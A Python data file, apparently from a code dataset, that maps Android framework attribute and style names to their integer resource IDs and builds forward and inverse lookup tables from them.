'popupMenuStyle' : 16843520,
'textAppearanceLargePopupMenu' : 16843521,
'textAppearanceSmallPopupMenu' : 16843522,
'breadCrumbTitle' : 16843523,
'breadCrumbShortTitle' : 16843524,
'listDividerAlertDialog' : 16843525,
'textColorAlertDialogListItem' : 16843526,
'loopViews' : 16843527,
'dialogTheme' : 16843528,
'alertDialogTheme' : 16843529,
'dividerVertical' : 16843530,
'homeAsUpIndicator' : 16843531,
'enterFadeDuration' : 16843532,
'exitFadeDuration' : 16843533,
'selectableItemBackground' : 16843534,
'autoAdvanceViewId' : 16843535,
'useIntrinsicSizeAsMinimum' : 16843536,
'actionModeCutDrawable' : 16843537,
'actionModeCopyDrawable' : 16843538,
'actionModePasteDrawable' : 16843539,
'textEditPasteWindowLayout' : 16843540,
'textEditNoPasteWindowLayout' : 16843541,
'textIsSelectable' : 16843542,
'windowEnableSplitTouch' : 16843543,
'indeterminateProgressStyle' : 16843544,
'progressBarPadding' : 16843545,
'animationResolution' : 16843546,
'state_accelerated' : 16843547,
'baseline' : 16843548,
'homeLayout' : 16843549,
'opacity' : 16843550,
'alpha' : 16843551,
'transformPivotX' : 16843552,
'transformPivotY' : 16843553,
'translationX' : 16843554,
'translationY' : 16843555,
'scaleX' : 16843556,
'scaleY' : 16843557,
'rotation' : 16843558,
'rotationX' : 16843559,
'rotationY' : 16843560,
'showDividers' : 16843561,
'dividerPadding' : 16843562,
'borderlessButtonStyle' : 16843563,
'dividerHorizontal' : 16843564,
'itemPadding' : 16843565,
'buttonBarStyle' : 16843566,
'buttonBarButtonStyle' : 16843567,
'segmentedButtonStyle' : 16843568,
'staticWallpaperPreview' : 16843569,
'allowParallelSyncs' : 16843570,
'isAlwaysSyncable' : 16843571,
'verticalScrollbarPosition' : 16843572,
'fastScrollAlwaysVisible' : 16843573,
'fastScrollThumbDrawable' : 16843574,
'fastScrollPreviewBackgroundLeft' : 16843575,
'fastScrollPreviewBackgroundRight' : 16843576,
'fastScrollTrackDrawable' : 16843577,
'fastScrollOverlayPosition' : 16843578,
'customTokens' : 16843579,
'nextFocusForward' : 16843580,
'firstDayOfWeek' : 16843581,
'showWeekNumber' : 16843582,
'minDate' : 16843583,
'maxDate' : 16843584,
'shownWeekCount' : 16843585,
'selectedWeekBackgroundColor' : 16843586,
'focusedMonthDateColor' : 16843587,
'unfocusedMonthDateColor' : 16843588,
'weekNumberColor' : 16843589,
'weekSeparatorLineColor' : 16843590,
'selectedDateVerticalBar' : 16843591,
'weekDayTextAppearance' : 16843592,
'dateTextAppearance' : 16843593,
'solidColor' : 16843594,
'spinnersShown' : 16843595,
'calendarViewShown' : 16843596,
'state_multiline' : 16843597,
'detailsElementBackground' : 16843598,
'textColorHighlightInverse' : 16843599,
'textColorLinkInverse' : 16843600,
'editTextColor' : 16843601,
'editTextBackground' : 16843602,
'horizontalScrollViewStyle' : 16843603,
'layerType' : 16843604,
'alertDialogIcon' : 16843605,
'windowMinWidthMajor' : 16843606,
'windowMinWidthMinor' : 16843607,
'queryHint' : 16843608,
'fastScrollTextColor' : 16843609,
'largeHeap' : 16843610,
'windowCloseOnTouchOutside' : 16843611,
'datePickerStyle' : 16843612,
'calendarViewStyle' : 16843613,
'textEditSidePasteWindowLayout' : 16843614,
'textEditSideNoPasteWindowLayout' : 16843615,
'actionMenuTextAppearance' : 16843616,
'actionMenuTextColor' : 16843617,
'textCursorDrawable' : 16843618,
'resizeMode' : 16843619,
'requiresSmallestWidthDp' : 16843620,
'compatibleWidthLimitDp' : 16843621,
'largestWidthLimitDp' : 16843622,
'state_hovered' : 16843623,
'state_drag_can_accept' : 16843624,
'state_drag_hovered' : 16843625,
'stopWithTask' : 16843626,
'switchTextOn' : 16843627,
'switchTextOff' : 16843628,
'switchPreferenceStyle' : 16843629,
'switchTextAppearance' : 16843630,
'track' : 16843631,
'switchMinWidth' : 16843632,
'switchPadding' : 16843633,
'thumbTextPadding' : 16843634,
'textSuggestionsWindowStyle' : 16843635,
'textEditSuggestionItemLayout' : 16843636,
'rowCount' : 16843637,
'rowOrderPreserved' : 16843638,
'columnCount' : 16843639,
'columnOrderPreserved' : 16843640,
'useDefaultMargins' : 16843641,
'alignmentMode' : 16843642,
'layout_row' : 16843643,
'layout_rowSpan' : 16843644,
'layout_columnSpan' : 16843645,
'actionModeSelectAllDrawable' : 16843646,
'isAuxiliary' : 16843647,
'accessibilityEventTypes' : 16843648,
'packageNames' : 16843649,
'accessibilityFeedbackType' : 16843650,
'notificationTimeout' : 16843651,
'accessibilityFlags' : 16843652,
'canRetrieveWindowContent' : 16843653,
'listPreferredItemHeightLarge' : 16843654,
'listPreferredItemHeightSmall' : 16843655,
'actionBarSplitStyle' : 16843656,
'actionProviderClass' : 16843657,
'backgroundStacked' : 16843658,
'backgroundSplit' : 16843659,
'textAllCaps' : 16843660,
'colorPressedHighlight' : 16843661,
'colorLongPressedHighlight' : 16843662,
'colorFocusedHighlight' : 16843663,
'colorActivatedHighlight' : 16843664,
'colorMultiSelectHighlight' : 16843665,
'drawableStart' : 16843666,
'drawableEnd' : 16843667,
'actionModeStyle' : 16843668,
'minResizeWidth' : 16843669,
'minResizeHeight' : 16843670,
'actionBarWidgetTheme' : 16843671,
'uiOptions' : 16843672,
'subtypeLocale' : 16843673,
'subtypeExtraValue' : 16843674,
'actionBarDivider' : 16843675,
'actionBarItemBackground' : 16843676,
'actionModeSplitBackground' : 16843677,
'textAppearanceListItem' : 16843678,
'textAppearanceListItemSmall' : 16843679,
'targetDescriptions' : 16843680,
'directionDescriptions' : 16843681,
'overridesImplicitlyEnabledSubtype' : 16843682,
'listPreferredItemPaddingLeft' : 16843683,
'listPreferredItemPaddingRight' : 16843684,
'requiresFadingEdge' : 16843685,
'publicKey' : 16843686,
'parentActivityName' : 16843687,
'isolatedProcess' : 16843689,
'importantForAccessibility' : 16843690,
'keyboardLayout' : 16843691,
'fontFamily' : 16843692,
'mediaRouteButtonStyle' : 16843693,
'mediaRouteTypes' : 16843694,
'supportsRtl' : 16843695,
'textDirection' : 16843696,
'textAlignment' : 16843697,
'layoutDirection' : 16843698,
'paddingStart' : 16843699,
'paddingEnd' : 16843700,
'layout_marginStart' : 16843701,
'layout_marginEnd' : 16843702,
'layout_toStartOf' : 16843703,
'layout_toEndOf' : 16843704,
'layout_alignStart' : 16843705,
'layout_alignEnd' : 16843706,
'layout_alignParentStart' : 16843707,
'layout_alignParentEnd' : 16843708,
'listPreferredItemPaddingStart' : 16843709,
'listPreferredItemPaddingEnd' : 16843710,
'singleUser' : 16843711,
'presentationTheme' : 16843712,
'subtypeId' : 16843713,
'initialKeyguardLayout' : 16843714,
'widgetCategory' : 16843716,
'permissionGroupFlags' : 16843717,
'labelFor' : 16843718,
'permissionFlags' : 16843719,
'checkedTextViewStyle' : 16843720,
'showOnLockScreen' : 16843721,
'format12Hour' : 16843722,
'format24Hour' : 16843723,
'timeZone' : 16843724,
'mipMap' : 16843725,
'mirrorForRtl' : 16843726,
'windowOverscan' : 16843727,
'requiredForAllUsers' : 16843728,
'indicatorStart' : 16843729,
'indicatorEnd' : 16843730,
'childIndicatorStart' : 16843731,
'childIndicatorEnd' : 16843732,
'restrictedAccountType' : 16843733,
'requiredAccountType' : 16843734,
'canRequestTouchExplorationMode' : 16843735,
'canRequestEnhancedWebAccessibility' : 16843736,
'canRequestFilterKeyEvents' : 16843737,
'layoutMode' : 16843738,
'keySet' : 16843739,
'targetId' : 16843740,
'fromScene' : 16843741,
'toScene' : 16843742,
'transition' : 16843743,
'transitionOrdering' : 16843744,
'fadingMode' : 16843745,
'startDelay' : 16843746,
'ssp' : 16843747,
'sspPrefix' : 16843748,
'sspPattern' : 16843749,
'addPrintersActivity' : 16843750,
'vendor' : 16843751,
'category' : 16843752,
'isAsciiCapable' : 16843753,
'autoMirrored' : 16843754,
'supportsSwitchingToNextInputMethod' : 16843755,
'requireDeviceUnlock' : 16843756,
'apduServiceBanner' : 16843757,
'accessibilityLiveRegion' : 16843758,
'windowTranslucentStatus' : 16843759,
'windowTranslucentNavigation' : 16843760,
'advancedPrintOptionsActivity' : 16843761,
'banner' : 16843762,
'windowSwipeToDismiss' : 16843763,
'isGame' : 16843764,
'allowEmbedded' : 16843765,
'setupActivity' : 16843766,
'fastScrollStyle' : 16843767,
'windowContentTransitions' : 16843768,
'windowContentTransitionManager' : 16843769,
'translationZ' : 16843770,
'tintMode' : 16843771,
'controlX1' : 16843772,
'controlY1' : 16843773,
'controlX2' : 16843774,
'controlY2' : 16843775,
'transitionName' : 16843776,
'transitionGroup' : 16843777,
'viewportWidth' : 16843778,
'viewportHeight' : 16843779,
'fillColor' : 16843780,
'pathData' : 16843781,
'strokeColor' : 16843782,
'strokeWidth' : 16843783,
'trimPathStart' : 16843784,
'trimPathEnd' : 16843785,
'trimPathOffset' : 16843786,
'strokeLineCap' : 16843787,
'strokeLineJoin' : 16843788,
'strokeMiterLimit' : 16843789,
'colorControlNormal' : 16843817,
'colorControlActivated' : 16843818,
'colorButtonNormal' : 16843819,
'colorControlHighlight' : 16843820,
'persistableMode' : 16843821,
'titleTextAppearance' : 16843822,
'subtitleTextAppearance' : 16843823,
'slideEdge' : 16843824,
'actionBarTheme' : 16843825,
'textAppearanceListItemSecondary' : 16843826,
'colorPrimary' : 16843827,
'colorPrimaryDark' : 16843828,
'colorAccent' : 16843829,
'nestedScrollingEnabled' : 16843830,
'windowEnterTransition' : 16843831,
'windowExitTransition' : 16843832,
'windowSharedElementEnterTransition' : 16843833,
'windowSharedElementExitTransition' : 16843834,
'windowAllowReturnTransitionOverlap' : 16843835,
'windowAllowEnterTransitionOverlap' : 16843836,
'sessionService' : 16843837,
'stackViewStyle' : 16843838,
'switchStyle' : 16843839,
'elevation' : 16843840,
'excludeId' : 16843841,
'excludeClass' : 16843842,
'hideOnContentScroll' : 16843843,
'actionOverflowMenuStyle' : 16843844,
'documentLaunchMode' : 16843845,
'maxRecents' : 16843846,
'autoRemoveFromRecents' : 16843847,
'stateListAnimator' : 16843848,
'toId' : 16843849,
'fromId' : 16843850,
'reversible' : 16843851,
'splitTrack' : 16843852,
'targetName' : 16843853,
'excludeName' : 16843854,
'matchOrder' : 16843855,
'windowDrawsSystemBarBackgrounds' : 16843856,
'statusBarColor' : 16843857,
'navigationBarColor' : 16843858,
'contentInsetStart' : 16843859,
'contentInsetEnd' : 16843860,
'contentInsetLeft' : 16843861,
'contentInsetRight' : 16843862,
'paddingMode' : 16843863,
'layout_rowWeight' : 16843864,
'layout_columnWeight' : 16843865,
'translateX' : 16843866,
'translateY' : 16843867,
'selectableItemBackgroundBorderless' : 16843868,
'elegantTextHeight' : 16843869,
'searchKeyphraseId' : 16843870,
'searchKeyphrase' : 16843871,
'searchKeyphraseSupportedLocales' : 16843872,
'windowTransitionBackgroundFadeDuration' : 16843873,
'overlapAnchor' : 16843874,
'progressTint' : 16843875,
'progressTintMode' : 16843876,
'progressBackgroundTint' : 16843877,
'progressBackgroundTintMode' : 16843878,
'secondaryProgressTint' : 16843879,
'secondaryProgressTintMode' : 16843880,
'indeterminateTint' : 16843881,
'indeterminateTintMode' : 16843882,
'backgroundTint' : 16843883,
'backgroundTintMode' : 16843884,
'foregroundTint' : 16843885,
'foregroundTintMode' : 16843886,
'buttonTint' : 16843887,
'buttonTintMode' : 16843888,
'thumbTint' : 16843889,
'thumbTintMode' : 16843890,
'fullBackupOnly' : 16843891,
'propertyXName' : 16843892,
'propertyYName' : 16843893,
'relinquishTaskIdentity' : 16843894,
'tileModeX' : 16843895,
'tileModeY' : 16843896,
'actionModeShareDrawable' : 16843897,
'actionModeFindDrawable' : 16843898,
'actionModeWebSearchDrawable' : 16843899,
'transitionVisibilityMode' : 16843900,
'minimumHorizontalAngle' : 16843901,
'minimumVerticalAngle' : 16843902,
'maximumAngle' : 16843903,
'searchViewStyle' : 16843904,
'closeIcon' : 16843905,
'goIcon' : 16843906,
'searchIcon' : 16843907,
'voiceIcon' : 16843908,
'commitIcon' : 16843909,
'suggestionRowLayout' : 16843910,
'queryBackground' : 16843911,
'submitBackground' : 16843912,
'buttonBarPositiveButtonStyle' : 16843913,
'buttonBarNeutralButtonStyle' : 16843914,
'buttonBarNegativeButtonStyle' : 16843915,
'popupElevation' : 16843916,
'actionBarPopupTheme' : 16843917,
'multiArch' : 16843918,
'touchscreenBlocksFocus' : 16843919,
'windowElevation' : 16843920,
'launchTaskBehindTargetAnimation' : 16843921,
'launchTaskBehindSourceAnimation' : 16843922,
'restrictionType' : 16843923,
'dayOfWeekBackground' : 16843924,
'dayOfWeekTextAppearance' : 16843925,
'headerMonthTextAppearance' : 16843926,
'headerDayOfMonthTextAppearance' : 16843927,
'headerYearTextAppearance' : 16843928,
'yearListItemTextAppearance' : 16843929,
'yearListSelectorColor' : 16843930,
'calendarTextColor' : 16843931,
'recognitionService' : 16843932,
'timePickerStyle' : 16843933,
'timePickerDialogTheme' : 16843934,
'headerTimeTextAppearance' : 16843935,
'headerAmPmTextAppearance' : 16843936,
'numbersTextColor' : 16843937,
'numbersBackgroundColor' : 16843938,
'numbersSelectorColor' : 16843939,
'amPmTextColor' : 16843940,
'amPmBackgroundColor' : 16843941,
'searchKeyphraseRecognitionFlags' : 16843942,
'checkMarkTint' : 16843943,
'checkMarkTintMode' : 16843944,
'popupTheme' : 16843945,
'toolbarStyle' : 16843946,
'windowClipToOutline' : 16843947,
'datePickerDialogTheme' : 16843948,
'showText' : 16843949,
'windowReturnTransition' : 16843950,
'windowReenterTransition' : 16843951,
'windowSharedElementReturnTransition' : 16843952,
'windowSharedElementReenterTransition' : 16843953,
'resumeWhilePausing' : 16843954,
'datePickerMode' : 16843955,
'timePickerMode' : 16843956,
'inset' : 16843957,
'letterSpacing' : 16843958,
'fontFeatureSettings' : 16843959,
'outlineProvider' : 16843960,
'contentAgeHint' : 16843961,
'country' : 16843962,
'windowSharedElementsUseOverlay' : 16843963,
'reparent' : 16843964,
'reparentWithOverlay' : 16843965,
'ambientShadowAlpha' : 16843966,
'spotShadowAlpha' : 16843967,
'navigationIcon' : 16843968,
'navigationContentDescription' : 16843969,
'fragmentExitTransition' : 16843970,
'fragmentEnterTransition' : 16843971,
'fragmentSharedElementEnterTransition' : 16843972,
'fragmentReturnTransition' : 16843973,
'fragmentSharedElementReturnTransition' : 16843974,
'fragmentReenterTransition' : 16843975,
'fragmentAllowEnterTransitionOverlap' : 16843976,
'fragmentAllowReturnTransitionOverlap' : 16843977,
'patternPathData' : 16843978,
'strokeAlpha' : 16843979,
'fillAlpha' : 16843980,
'windowActivityTransitions' : 16843981,
'colorEdgeEffect' : 16843982
}
}
SYSTEM_RESOURCES = {
"attributes": {
"forward": {k: v for k, v in resources['attr'].items()},
"inverse": {v: k for k, v in resources['attr'].items()}
},
"styles": {
"forward": {k: v for k, v in resources['style'].items()},
"inverse": {v: k for k, v in resources['style'].items()}
}
}
| 44.947314 | 85 | 0.644051 | resources = {
'style': {
'Animation' : 16973824,
'Animation.Activity' : 16973825,
'Animation.Dialog' : 16973826,
'Animation.InputMethod' : 16973910,
'Animation.Toast' : 16973828,
'Animation.Translucent' : 16973827,
'DeviceDefault.ButtonBar' : 16974287,
'DeviceDefault.ButtonBar.AlertDialog' : 16974288,
'DeviceDefault.Light.ButtonBar' : 16974290,
'DeviceDefault.Light.ButtonBar.AlertDialog' : 16974291,
'DeviceDefault.Light.SegmentedButton' : 16974292,
'DeviceDefault.SegmentedButton' : 16974289,
'Holo.ButtonBar' : 16974053,
'Holo.ButtonBar.AlertDialog' : 16974055,
'Holo.Light.ButtonBar' : 16974054,
'Holo.Light.ButtonBar.AlertDialog' : 16974056,
'Holo.Light.SegmentedButton' : 16974058,
'Holo.SegmentedButton' : 16974057,
'MediaButton' : 16973879,
'MediaButton.Ffwd' : 16973883,
'MediaButton.Next' : 16973881,
'MediaButton.Pause' : 16973885,
'MediaButton.Play' : 16973882,
'MediaButton.Previous' : 16973880,
'MediaButton.Rew' : 16973884,
'TextAppearance' : 16973886,
'TextAppearance.DeviceDefault' : 16974253,
'TextAppearance.DeviceDefault.DialogWindowTitle' : 16974264,
'TextAppearance.DeviceDefault.Inverse' : 16974254,
'TextAppearance.DeviceDefault.Large' : 16974255,
'TextAppearance.DeviceDefault.Large.Inverse' : 16974256,
'TextAppearance.DeviceDefault.Medium' : 16974257,
'TextAppearance.DeviceDefault.Medium.Inverse' : 16974258,
'TextAppearance.DeviceDefault.SearchResult.Subtitle' : 16974262,
'TextAppearance.DeviceDefault.SearchResult.Title' : 16974261,
'TextAppearance.DeviceDefault.Small' : 16974259,
'TextAppearance.DeviceDefault.Small.Inverse' : 16974260,
'TextAppearance.DeviceDefault.Widget' : 16974265,
'TextAppearance.DeviceDefault.Widget.ActionBar.Menu' : 16974286,
'TextAppearance.DeviceDefault.Widget.ActionBar.Subtitle' : 16974279,
'TextAppearance.DeviceDefault.Widget.ActionBar.Subtitle.Inverse' : 16974283,
'TextAppearance.DeviceDefault.Widget.ActionBar.Title' : 16974278,
'TextAppearance.DeviceDefault.Widget.ActionBar.Title.Inverse' : 16974282,
'TextAppearance.DeviceDefault.Widget.ActionMode.Subtitle' : 16974281,
'TextAppearance.DeviceDefault.Widget.ActionMode.Subtitle.Inverse' : 16974285,
'TextAppearance.DeviceDefault.Widget.ActionMode.Title' : 16974280,
'TextAppearance.DeviceDefault.Widget.ActionMode.Title.Inverse' : 16974284,
'TextAppearance.DeviceDefault.Widget.Button' : 16974266,
'TextAppearance.DeviceDefault.Widget.DropDownHint' : 16974271,
'TextAppearance.DeviceDefault.Widget.DropDownItem' : 16974272,
'TextAppearance.DeviceDefault.Widget.EditText' : 16974274,
'TextAppearance.DeviceDefault.Widget.IconMenu.Item' : 16974267,
'TextAppearance.DeviceDefault.Widget.PopupMenu' : 16974275,
'TextAppearance.DeviceDefault.Widget.PopupMenu.Large' : 16974276,
'TextAppearance.DeviceDefault.Widget.PopupMenu.Small' : 16974277,
'TextAppearance.DeviceDefault.Widget.TabWidget' : 16974268,
'TextAppearance.DeviceDefault.Widget.TextView' : 16974269,
'TextAppearance.DeviceDefault.Widget.TextView.PopupMenu' : 16974270,
'TextAppearance.DeviceDefault.Widget.TextView.SpinnerItem' : 16974273,
'TextAppearance.DeviceDefault.WindowTitle' : 16974263,
'TextAppearance.DialogWindowTitle' : 16973889,
'TextAppearance.Holo' : 16974075,
'TextAppearance.Holo.DialogWindowTitle' : 16974103,
'TextAppearance.Holo.Inverse' : 16974076,
'TextAppearance.Holo.Large' : 16974077,
'TextAppearance.Holo.Large.Inverse' : 16974078,
'TextAppearance.Holo.Medium' : 16974079,
'TextAppearance.Holo.Medium.Inverse' : 16974080,
'TextAppearance.Holo.SearchResult.Subtitle' : 16974084,
'TextAppearance.Holo.SearchResult.Title' : 16974083,
'TextAppearance.Holo.Small' : 16974081,
'TextAppearance.Holo.Small.Inverse' : 16974082,
'TextAppearance.Holo.Widget' : 16974085,
'TextAppearance.Holo.Widget.ActionBar.Menu' : 16974112,
'TextAppearance.Holo.Widget.ActionBar.Subtitle' : 16974099,
'TextAppearance.Holo.Widget.ActionBar.Subtitle.Inverse' : 16974109,
'TextAppearance.Holo.Widget.ActionBar.Title' : 16974098,
'TextAppearance.Holo.Widget.ActionBar.Title.Inverse' : 16974108,
'TextAppearance.Holo.Widget.ActionMode.Subtitle' : 16974101,
'TextAppearance.Holo.Widget.ActionMode.Subtitle.Inverse' : 16974111,
'TextAppearance.Holo.Widget.ActionMode.Title' : 16974100,
'TextAppearance.Holo.Widget.ActionMode.Title.Inverse' : 16974110,
'TextAppearance.Holo.Widget.Button' : 16974086,
'TextAppearance.Holo.Widget.DropDownHint' : 16974091,
'TextAppearance.Holo.Widget.DropDownItem' : 16974092,
'TextAppearance.Holo.Widget.EditText' : 16974094,
'TextAppearance.Holo.Widget.IconMenu.Item' : 16974087,
'TextAppearance.Holo.Widget.PopupMenu' : 16974095,
'TextAppearance.Holo.Widget.PopupMenu.Large' : 16974096,
'TextAppearance.Holo.Widget.PopupMenu.Small' : 16974097,
'TextAppearance.Holo.Widget.TabWidget' : 16974088,
'TextAppearance.Holo.Widget.TextView' : 16974089,
'TextAppearance.Holo.Widget.TextView.PopupMenu' : 16974090,
'TextAppearance.Holo.Widget.TextView.SpinnerItem' : 16974093,
'TextAppearance.Holo.WindowTitle' : 16974102,
'TextAppearance.Inverse' : 16973887,
'TextAppearance.Large' : 16973890,
'TextAppearance.Large.Inverse' : 16973891,
'TextAppearance.Material' : 16974317,
'TextAppearance.Material.Body1' : 16974320,
'TextAppearance.Material.Body2' : 16974319,
'TextAppearance.Material.Button' : 16974318,
'TextAppearance.Material.Caption' : 16974321,
'TextAppearance.Material.DialogWindowTitle' : 16974322,
'TextAppearance.Material.Display1' : 16974326,
'TextAppearance.Material.Display2' : 16974325,
'TextAppearance.Material.Display3' : 16974324,
'TextAppearance.Material.Display4' : 16974323,
'TextAppearance.Material.Headline' : 16974327,
'TextAppearance.Material.Inverse' : 16974328,
'TextAppearance.Material.Large' : 16974329,
'TextAppearance.Material.Large.Inverse' : 16974330,
'TextAppearance.Material.Medium' : 16974331,
'TextAppearance.Material.Medium.Inverse' : 16974332,
'TextAppearance.Material.Menu' : 16974333,
'TextAppearance.Material.Notification' : 16974334,
'TextAppearance.Material.Notification.Emphasis' : 16974335,
'TextAppearance.Material.Notification.Info' : 16974336,
'TextAppearance.Material.Notification.Line2' : 16974337,
'TextAppearance.Material.Notification.Time' : 16974338,
'TextAppearance.Material.Notification.Title' : 16974339,
'TextAppearance.Material.SearchResult.Subtitle' : 16974340,
'TextAppearance.Material.SearchResult.Title' : 16974341,
'TextAppearance.Material.Small' : 16974342,
'TextAppearance.Material.Small.Inverse' : 16974343,
'TextAppearance.Material.Subhead' : 16974344,
'TextAppearance.Material.Title' : 16974345,
'TextAppearance.Material.Widget' : 16974347,
'TextAppearance.Material.Widget.ActionBar.Menu' : 16974348,
'TextAppearance.Material.Widget.ActionBar.Subtitle' : 16974349,
'TextAppearance.Material.Widget.ActionBar.Subtitle.Inverse' : 16974350,
'TextAppearance.Material.Widget.ActionBar.Title' : 16974351,
'TextAppearance.Material.Widget.ActionBar.Title.Inverse' : 16974352,
'TextAppearance.Material.Widget.ActionMode.Subtitle' : 16974353,
'TextAppearance.Material.Widget.ActionMode.Subtitle.Inverse' : 16974354,
'TextAppearance.Material.Widget.ActionMode.Title' : 16974355,
'TextAppearance.Material.Widget.ActionMode.Title.Inverse' : 16974356,
'TextAppearance.Material.Widget.Button' : 16974357,
'TextAppearance.Material.Widget.DropDownHint' : 16974358,
'TextAppearance.Material.Widget.DropDownItem' : 16974359,
'TextAppearance.Material.Widget.EditText' : 16974360,
'TextAppearance.Material.Widget.IconMenu.Item' : 16974361,
'TextAppearance.Material.Widget.PopupMenu' : 16974362,
'TextAppearance.Material.Widget.PopupMenu.Large' : 16974363,
'TextAppearance.Material.Widget.PopupMenu.Small' : 16974364,
'TextAppearance.Material.Widget.TabWidget' : 16974365,
'TextAppearance.Material.Widget.TextView' : 16974366,
'TextAppearance.Material.Widget.TextView.PopupMenu' : 16974367,
'TextAppearance.Material.Widget.TextView.SpinnerItem' : 16974368,
'TextAppearance.Material.Widget.Toolbar.Subtitle' : 16974369,
'TextAppearance.Material.Widget.Toolbar.Title' : 16974370,
'TextAppearance.Material.WindowTitle' : 16974346,
'TextAppearance.Medium' : 16973892,
'TextAppearance.Medium.Inverse' : 16973893,
'TextAppearance.Small' : 16973894,
'TextAppearance.Small.Inverse' : 16973895,
'TextAppearance.StatusBar.EventContent' : 16973927,
'TextAppearance.StatusBar.EventContent.Title' : 16973928,
'TextAppearance.StatusBar.Icon' : 16973926,
'TextAppearance.StatusBar.Title' : 16973925,
'TextAppearance.SuggestionHighlight' : 16974104,
'TextAppearance.Theme' : 16973888,
'TextAppearance.Theme.Dialog' : 16973896,
'TextAppearance.Widget' : 16973897,
'TextAppearance.Widget.Button' : 16973898,
'TextAppearance.Widget.DropDownHint' : 16973904,
'TextAppearance.Widget.DropDownItem' : 16973905,
'TextAppearance.Widget.EditText' : 16973900,
'TextAppearance.Widget.IconMenu.Item' : 16973899,
'TextAppearance.Widget.PopupMenu.Large' : 16973952,
'TextAppearance.Widget.PopupMenu.Small' : 16973953,
'TextAppearance.Widget.TabWidget' : 16973901,
'TextAppearance.Widget.TextView' : 16973902,
'TextAppearance.Widget.TextView.PopupMenu' : 16973903,
'TextAppearance.Widget.TextView.SpinnerItem' : 16973906,
'TextAppearance.WindowTitle' : 16973907,
'Theme' : 16973829,
'ThemeOverlay' : 16974407,
'ThemeOverlay.Material' : 16974408,
'ThemeOverlay.Material.ActionBar' : 16974409,
'ThemeOverlay.Material.Dark' : 16974411,
'ThemeOverlay.Material.Dark.ActionBar' : 16974412,
'ThemeOverlay.Material.Light' : 16974410,
'Theme.Black' : 16973832,
'Theme.Black.NoTitleBar' : 16973833,
'Theme.Black.NoTitleBar.Fullscreen' : 16973834,
'Theme.DeviceDefault' : 16974120,
'Theme.DeviceDefault.Dialog' : 16974126,
'Theme.DeviceDefault.DialogWhenLarge' : 16974134,
'Theme.DeviceDefault.DialogWhenLarge.NoActionBar' : 16974135,
'Theme.DeviceDefault.Dialog.MinWidth' : 16974127,
'Theme.DeviceDefault.Dialog.NoActionBar' : 16974128,
'Theme.DeviceDefault.Dialog.NoActionBar.MinWidth' : 16974129,
'Theme.DeviceDefault.InputMethod' : 16974142,
'Theme.DeviceDefault.Light' : 16974123,
'Theme.DeviceDefault.Light.DarkActionBar' : 16974143,
'Theme.DeviceDefault.Light.Dialog' : 16974130,
'Theme.DeviceDefault.Light.DialogWhenLarge' : 16974136,
'Theme.DeviceDefault.Light.DialogWhenLarge.NoActionBar' : 16974137,
'Theme.DeviceDefault.Light.Dialog.MinWidth' : 16974131,
'Theme.DeviceDefault.Light.Dialog.NoActionBar' : 16974132,
'Theme.DeviceDefault.Light.Dialog.NoActionBar.MinWidth' : 16974133,
'Theme.DeviceDefault.Light.NoActionBar' : 16974124,
'Theme.DeviceDefault.Light.NoActionBar.Fullscreen' : 16974125,
'Theme.DeviceDefault.Light.NoActionBar.Overscan' : 16974304,
'Theme.DeviceDefault.Light.NoActionBar.TranslucentDecor' : 16974308,
'Theme.DeviceDefault.Light.Panel' : 16974139,
'Theme.DeviceDefault.NoActionBar' : 16974121,
'Theme.DeviceDefault.NoActionBar.Fullscreen' : 16974122,
'Theme.DeviceDefault.NoActionBar.Overscan' : 16974303,
'Theme.DeviceDefault.NoActionBar.TranslucentDecor' : 16974307,
'Theme.DeviceDefault.Panel' : 16974138,
'Theme.DeviceDefault.Settings' : 16974371,
'Theme.DeviceDefault.Wallpaper' : 16974140,
'Theme.DeviceDefault.Wallpaper.NoTitleBar' : 16974141,
'Theme.Dialog' : 16973835,
'Theme.Holo' : 16973931,
'Theme.Holo.Dialog' : 16973935,
'Theme.Holo.DialogWhenLarge' : 16973943,
'Theme.Holo.DialogWhenLarge.NoActionBar' : 16973944,
'Theme.Holo.Dialog.MinWidth' : 16973936,
'Theme.Holo.Dialog.NoActionBar' : 16973937,
'Theme.Holo.Dialog.NoActionBar.MinWidth' : 16973938,
'Theme.Holo.InputMethod' : 16973951,
'Theme.Holo.Light' : 16973934,
'Theme.Holo.Light.DarkActionBar' : 16974105,
'Theme.Holo.Light.Dialog' : 16973939,
'Theme.Holo.Light.DialogWhenLarge' : 16973945,
'Theme.Holo.Light.DialogWhenLarge.NoActionBar' : 16973946,
'Theme.Holo.Light.Dialog.MinWidth' : 16973940,
'Theme.Holo.Light.Dialog.NoActionBar' : 16973941,
'Theme.Holo.Light.Dialog.NoActionBar.MinWidth' : 16973942,
'Theme.Holo.Light.NoActionBar' : 16974064,
'Theme.Holo.Light.NoActionBar.Fullscreen' : 16974065,
'Theme.Holo.Light.NoActionBar.Overscan' : 16974302,
'Theme.Holo.Light.NoActionBar.TranslucentDecor' : 16974306,
'Theme.Holo.Light.Panel' : 16973948,
'Theme.Holo.NoActionBar' : 16973932,
'Theme.Holo.NoActionBar.Fullscreen' : 16973933,
'Theme.Holo.NoActionBar.Overscan' : 16974301,
'Theme.Holo.NoActionBar.TranslucentDecor' : 16974305,
'Theme.Holo.Panel' : 16973947,
'Theme.Holo.Wallpaper' : 16973949,
'Theme.Holo.Wallpaper.NoTitleBar' : 16973950,
'Theme.InputMethod' : 16973908,
'Theme.Light' : 16973836,
'Theme.Light.NoTitleBar' : 16973837,
'Theme.Light.NoTitleBar.Fullscreen' : 16973838,
'Theme.Light.Panel' : 16973914,
'Theme.Light.WallpaperSettings' : 16973922,
'Theme.Material' : 16974372,
'Theme.Material.Dialog' : 16974373,
'Theme.Material.DialogWhenLarge' : 16974379,
'Theme.Material.DialogWhenLarge.NoActionBar' : 16974380,
'Theme.Material.Dialog.Alert' : 16974374,
'Theme.Material.Dialog.MinWidth' : 16974375,
'Theme.Material.Dialog.NoActionBar' : 16974376,
'Theme.Material.Dialog.NoActionBar.MinWidth' : 16974377,
'Theme.Material.Dialog.Presentation' : 16974378,
'Theme.Material.InputMethod' : 16974381,
'Theme.Material.Light' : 16974391,
'Theme.Material.Light.DarkActionBar' : 16974392,
'Theme.Material.Light.Dialog' : 16974393,
'Theme.Material.Light.DialogWhenLarge' : 16974399,
'Theme.Material.Light.DialogWhenLarge.NoActionBar' : 16974400,
'Theme.Material.Light.Dialog.Alert' : 16974394,
'Theme.Material.Light.Dialog.MinWidth' : 16974395,
'Theme.Material.Light.Dialog.NoActionBar' : 16974396,
'Theme.Material.Light.Dialog.NoActionBar.MinWidth' : 16974397,
'Theme.Material.Light.Dialog.Presentation' : 16974398,
'Theme.Material.Light.NoActionBar' : 16974401,
